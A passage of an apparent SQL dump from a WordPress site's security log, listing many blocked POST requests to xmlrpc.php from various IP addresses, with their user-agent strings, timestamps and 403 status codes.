Safari\\/537.36\"}','pm87Rs5Tb6a9DAUr3Qtcv1nG',0,1680894951.3304,550,'','POST',403,0,515,0,1,'',0),('67.222.130.10',1138655754,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','etK1NlEnSr4fOLUb0YHPm5Ai',0,1680894952.1363,587,'','POST',403,0,515,0,1,'',0),('64.227.108.223',1088646367,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','rX9UfLwzAKsDcYSFWCmJl15B',0,1680894980.3811,598,'','POST',403,0,515,0,1,'',0),('37.120.155.179',628661171,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','eyVJQzTLsKYdi9CUGrxAfIqw',0,1680895523.7356,3738,'','POST',403,0,515,0,1,'',0),('185.200.116.219',3116922075,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','wP73rMemY6QyDihTcl2bEojI',0,1680896147.3274,700,'','POST',403,0,515,0,1,'',0),('91.206.201.230',1540278758,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','5Fl1PfEz3uSxQoDatpdXOr9U',0,1680896373.9242,540,'','POST',403,0,515,0,1,'',0),('104.37.86.31',1747277343,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','GRVkahbFt82BUxM4pm0Hn1OZ',0,1680896377.6002,890,'','POST',403,0,515,0,1,'',0),('193.141.65.121',3247260025,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','ge6TFVxiZ02psLo3NRbrwDhc',0,1680896378.1625,837,'','POST',403,0,515,0,1,'',0),('91.219.122.50',1541110322,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','zXtfTqyc9RFh0JUmEMDvV6se',0,1680896382.4644,1506,'','POST',403,0,515,0,1,'',0),('192.111.150.75',3228538443,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','vnuL8QfM9R4hDwkdIjiOgSEY',0,1680896382.6639,1419,'','POST',403,0,515,0,1,'',0),('52.188.47.47',884748079,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','z02k1nmPoAagjweOXv5NTBY3',0,1680896387.9195,548,'','POST',403,0,515,0,1,'',0),('68.183.144.184',1152880824,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','abIwHzgte0h4dQfAk7YciyRM',0,1680896397.0181,1309,'','POST',403,0,515,0,1,'',0),('182.92.129.110',3059515758,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','Fzv3KXa4TmhHnIZJiAgdYtWM',0,1680896404.7510,803,'','POST',403,0,515,0,1,'',0),('91.107.196.183',1533789367,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','TonLqyR4jDJ6Mv07mPwihO15',0,1680896413.4418,610,'','POST',403,0,515,0,1,'',0),('184.75.221.35',3091979555,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','fNLAZp8cPlmsHxrg9JTYIvbw',0,1680897740.0274,4019,'','POST',403,0,515,0,1,'',0),('198.203.28.43',3335199787,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','RrgStkUaPoxDElLq9HvO4MbW',0,1680898051.1579,2918,'','POST',403,0,515,0,1,'',0),('193.37.254.35',3240492579,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','eO12aU0GJmNX3iTyVBwQ4WHA',0,1680898400.6957,3713,'','POST',403,0,515,0,1,'',0),('89.249.74.218',1509509850,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','dKEpU4XfW30rCsSHDizqVQFj',0,1680899735.9193,3723,'','POST',403,0,515,0,1,'',0),('193.37.254.35',3240492579,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','zs9Qfxk72dOFvuEiwbSKDNGe',0,1680900099.0226,2407,'','POST',403,0,515,0,1,'',0),('54.249.226.226',922346210,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','YNKQHe5MSv4UnzCIquhO8pi0',0,1680901048.1312,4023,'','POST',403,0,515,0,1,'',0),('103.124.94.44',1736203820,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','9Ui7IFd18rBvt3lbg024Gjmy',0,1680901050.4932,1663,'','POST',403,0,515,0,1,'',0),('81.181.130.56',1370849848,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','J4Y9cLTrlZ1okudwhIbRFzyO',0,1680901054.4229,579,'','POST',403,0,515,0,1,'',0),('103.130.219.197',1736629189,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','evodThzXBjlUHM3Fa4Y16Cps',0,1680901055.7410,626,'','POST',403,0,515,0,1,'',0),('114.215.93.65',1926716737,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','pYubPUB76cjXvRzMTtZASfa8',0,1680901068.5854,545,'','POST',403,0,515,0,1,'',0),('188.68.47.117',3158585205,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','pYLyMs31Pui2SWdefk5clJrz',0,1680901071.7898,568,'','POST',403,0,515,0,1,'',0),('155.94.140.179',2606664883,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','LZmk2HGcETfh0bwPOFJxNQny',0,1680901076.8153,565,'','POST',403,0,515,0,1,'',0),('66.248.237.41',1123609897,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','2CARsEI7pVw4tSmNO8LJU5Hh',0,1680901084.9221,590,'','POST',403,0,515,0,1,'',0),('91.107.196.183',1533789367,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','mWFI93GkQEJ7h4yswUbcSqp0',0,1680901095.7808,540,'','POST',403,0,515,0,1,'',0),('157.230.114.25',2649125401,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','3h4RibvT7SJ9Ccsqfm6aVIUn',0,1680901097.0164,563,'','POST',403,0,515,0,1,'',0),('129.226.138.214',2179107542,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','q3txb0QHWF27Nod6DUJmLu1V',0,1680901114.3290,572,'','POST',403,0,515,0,1,'',0),('213.152.187.225',3583556577,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','wiAQqlvIgajEXbzetN62CTS1',0,1680901786.5061,725,'','POST',403,0,515,0,1,'',0),('213.152.187.225',3583556577,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','OaHoWRfjdq6hKGYxlk4pN235',0,1680902451.6629,3526,'','POST',403,0,515,0,1,'',0),('148.66.147.20',2487390996,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','SuicEhKbjHotJI8VZrgm1NvU',0,1680902732.7580,1640,'','POST',403,0,515,0,1,'',0),('67.23.226.46',1125638702,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','GXgtR9EcAB6p5qid3vkhQHTK',0,1680902737.2812,637,'','POST',403,0,515,0,1,'',0),('104.223.9.58',1759447354,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','WGz2boyTaSfBODj1rRpFqxn4',0,1680902756.6326,592,'','POST',403,0,515,0,1,'',0),('81.208.11.40',1372588840,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','pd6VtxsfKZNX1Q9LwTJFbcDP',0,1680902758.9557,556,'','POST',403,0,515,0,1,'',0),('8.210.238.120',148041336,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','QLhbXSURfMmNH1I6POyjGZqi',0,1680902764.7484,603,'','POST',403,0,515,0,1,'',0),('156.224.21.75',2631931211,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','PjLTEtKeGiFAlbzad28rDBYU',0,1680902770.0837,553,'','POST',403,0,515,0,1,'',0),('91.206.201.230',1540278758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','g91rFIeAzPySmXpujs48Mdi3',0,1680902773.4954,580,'','POST',403,0,515,0,1,'',0),('13.75.144.52',223055924,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','SlMGDhVTrx45U92tbO7aYQ3n',0,1680902775.1957,670,'','POST',403,0,515,0,1,'',0),('68.183.83.210',1152865234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','dPJtuHN7bkZLSMIhsrzqVYxy',0,1680902785.0023,568,'','POST',403,0,515,0,1,'',0),('146.70.115.219',2454090715,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','nGOwSzNiQCy4MgU9Ws6a1kPT',0,1680903926.2042,3868,'','POST',403,0,515,0,1,'',0),('185.9.19.107',3104379755,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','rC2qZLQ9Bix4hGmIJ8Va7A5n',0,1680904065.8284,551,'','POST',403,0,515,0,1,'',0),('213.152.161.101',3583549797,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','QuNWhVnfYp2t1RjMZqsOyFCL',0,1680905893.5291,4383,'','POST',403,0,515,0,1,'',0),('194.59.206.66',3258699330,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','JaUIAcfh5Xm6Zv3QOwKPij7y',0,1680906564.6225,3827,'','POST',403,0,515,0,1,'',0),('5.22.249.133',85391749,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','twEkjG7Z1nObv56sA0f32rYq',0,1680906567.1462,1407,'','POST',403,0,515,0,1,'',0),('124.6.63.132',2080784260,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','Fhn4Dlog1EOiILd2keacwuZK',0,1680906574.9158,546,'','POST',403,0,515,0,1,'',0),('203.154.39.241',3415877617,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','jqmMcfVzAplkKSQT76beINua',0,1680906581.6672,588,'','POST',403,0,515,0,1,'',0),('159.203.161.65',2680922433,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','htBLWrYiNUvX1FbSEM7T9zex',0,1680906586.3523,564,'','POST',403,0,515,0,1,'',0),('68.178.145.131',1152553347,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','hsnTyNEMlXQCgcoea140uOY8',0,1680906588.4069,574,'','POST',403,0,515,0,1,'',0),('67.227.167.13',1138992909,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','WpSN75dmGDgICAkHjfJMwcuU',0,1680906592.4643,1328,'','POST',403,0,515,0,1,'',0),('194.233.85.167',3270071719,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','wyGBqjKFrn0VzUldtA8a5uJg',0,1680906600.4925,548,'','POST',403,0,515,0,1,'',0),('79.142.69.160',1334724000,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','XcAod49nwS6mUKQDz1RIlriG',0,1680906725.4391,608,'','POST',403,0,515,0,1,'',0),('103.139.1.249',1737163257,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','ZmOu6zD9P0akHfK4AxgVjno5',0,1680906891.5522,3995,'','POST',403,0,515,0,1,'',0),('72.167.69.17',1218921745,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','df4CpTrbnaNSU8JHXVxjylo5',0,1680906889.8517,6231,'','POST',403,0,515,0,1,'',0),('156.38.151.68',2619774788,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','zqYmQZAp0lw2RxHvj76CML3o',0,1680906907.0415,1334,'','POST',403,0,515,0,1,'',0),('209.236.124.38',3521936422,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','uoXKw3fg6bYIARqaE4L9UHFW',0,1680906907.3398,1297,'','POST',403,0,515,0,1,'',0),('157.245.152.250',2650118394,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','1tYe8VoymOLHhaKAzXinsUxD',0,1680906921.7256,551,'','POST',403,0,515,0,1,'',0),('209.126.81.27',3514716443,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','aYnkr0pul4JsDoOfWK6NgIM2',0,1680906923.0727,559,'','POST',403,0,515,0,1,'',0),('113.190.234.69',1908337221,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','X9zi0jmObGKen2caMAstRDwy',0,1680906926.8316,570,'','POST',403,0,515,0,1,'',0),('185.182.56.188',3115727036,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','dZqHm2RrVkPejJo38agw1SBi',0,1680906941.0049,662,'','POST',403,0,515,0,1,'',0),('72.167.69.17',1218921745,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','KXhA0TRvwdt2qoHrY6VLgDcS',0,1680906945.9566,621,'','POST',403,0,515,0,1,'',0),('52.131.252.156',881065116,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','TJnK6wjqYA1B2iUygNWvZ73x',0,1680906954.3342,597,'','POST',403,0,515,0,1,'',0),('75.129.92.62',1266768958,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','QjwnYIBkWPq93tUZAVv8RJgl',0,1680907002.5134,547,'','POST',403,0,515,0,1,'',0),('50.62.177.177',842969521,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','5I2sm9BzHK4ncXWLTtDj3laF',0,1680907031.1065,542,'','POST',403,0,515,0,1,'',0),('104.254.90.235',1761499883,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','wHEzDTrqCojQYX6iBNPsL0AU',0,1680907286.4732,3524,'','POST',403,0,515,0,1,'',0),('213.152.161.138',3583549834,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','w6F1CYGZP5oJW42XtE3cKuap',0,1680908758.6560,723,'','POST',403,0,515,0,1,'',0),('38.240.226.19',653320723,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','39OxrKGSvhlHfpdb0y2WM5u8',0,1680909561.3000,3400,'','POST',403,0,515,0,1,'',0),('213.152.161.240',3583549936,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','EPkopWNng9BFe4ST0yz3b1Zw',0,1680909667.5211,547,'','POST',403,0,515,0,1,'',0),('185.156.175.35',3114053411,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','dinxZrmEUcaTIVHvfJlqy1sp',0,1680909868.1439,3109,'','POST',403,0,515,0,1,'',0),('178.162.212.214',2997015766,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','QX2OGsPw07AVMhFDc1lKaZEb',0,1680910599.7493,3602,'','POST',403,0,515,0,1,'',0),('91.206.201.230',1540278758,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','KfY01Jieh8LN29dOytwmPxXH',0,1680911309.0041,689,'','POST',403,0,515,0,1,'',0),('139.162.104.127',2342676607,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','rylAnYJoajqcmsEGp2v7THUt',0,1680911317.1254,587,'','POST',403,0,515,0,1,'',0),('86.48.23.13',1445992205,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','xiz5JK8C0PUtnjDYraANBqoL',0,1680911317.9569,572,'','POST',403,0,515,0,1,'',0),('144.24.100.136',2417517704,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','pndjkocD23OVKQIJ4a81wTWX',0,1680911326.2176,2575,'','POST',403,0,515,0,1,'',0),('109.169.53.7',1839805703,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','Aezaq986ITWQUHXJLKPZxv50',0,1680911329.1424,582,'','POST',403,0,515,0,1,'',0),('194.59.206.66',3258699330,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','sTOA174Ka5HVNrnpwiexbdIc',0,1680911334.0265,602,'','POST',403,0,515,0,1,'',0),('94.124.93.44',1585208620,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','6AqJvegfanhb9VkL3NFBYHPI',0,1680911350.8003,548,'','POST',403,0,515,0,1,'',0),('103.130.219.197',1736629189,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','5zHjJ0TA9rBYiyg8d4Sp6Zal',0,1680911356.0288,550,'','POST',403,0,515,0,1,'',0),('198.23.62.79',3323412047,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','GOKfjReQg8Nnkvc3BD09LWEh',0,1680911356.9124,533,'','POST',403,0,515,0,1,'',0),('68.178.145.131',1152553347,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','4Cq81wRKusEOfhpIlbJe2H7Z',0,1680911365.8760,590,'','POST',403,0,515,0,1,'',0),('203.154.39.241',3415877617,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','APwQvdtDj7O3V0iefCKMgSzI',0,1680911372.5546,555,'','POST',403,0,515,0,1,'',0),('62.102.148.187',1046910139,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 